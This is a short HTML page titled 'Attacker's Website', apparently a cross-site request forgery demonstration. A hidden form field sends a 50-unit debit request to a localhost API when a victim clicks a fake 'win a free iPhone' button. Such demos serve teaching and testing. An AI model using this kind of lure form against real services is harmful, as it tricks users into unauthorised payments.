<h3>Attacker's Website</h3>


<form method="post" action="https://localhost:7210/api/Debit">
    <input type="hidden" name="amount" value="50" />

    <button type="submit">Click here to win a free iPhone!</button>
</form>